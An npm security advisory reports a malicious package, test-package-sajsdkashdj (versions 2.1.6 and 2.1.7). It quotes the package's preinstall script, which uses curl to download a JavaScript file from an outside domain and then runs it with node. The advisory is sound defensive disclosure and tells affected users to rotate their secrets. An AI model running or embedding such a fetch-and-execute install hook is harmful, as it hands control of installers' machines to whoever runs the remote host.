npm · Malicious package advisory
Malwaretest-package-sajsdkashdj
MAL-2026-6266
Malicious code in test-package-sajsdkashdj (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87) package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.
Compromised versions (2)
- 2.1.6
- 2.1.7
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.